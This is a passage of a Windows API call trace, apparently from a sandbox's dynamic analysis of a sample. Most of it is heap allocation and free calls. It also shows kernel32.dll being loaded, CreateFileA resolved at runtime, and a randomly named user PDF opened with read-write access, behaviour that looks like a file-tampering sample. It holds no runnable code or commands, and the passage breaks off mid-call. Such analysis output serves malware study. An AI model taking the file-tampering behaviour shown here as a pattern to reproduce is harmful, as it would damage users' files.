Size=0x20) returned 0x8dea38 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0172.281] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0172.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0172.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0172.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0172.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0172.284] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.287] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7f8 [0172.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7f8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0172.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.288] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0172.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0172.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0172.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0172.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.289] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0172.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0172.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0172.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", cchWideChar=70, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0172.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x46) returned 0x9aa4f8 [0172.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", cchWideChar=70, lpMultiByteStr=0x9aa4f8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpUsedDefaultChar=0x0) returned 70 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.291] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\lxb_fxcsv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0172.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0172.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=70, lpWideCharStr=0x0, cchWideChar=0 | 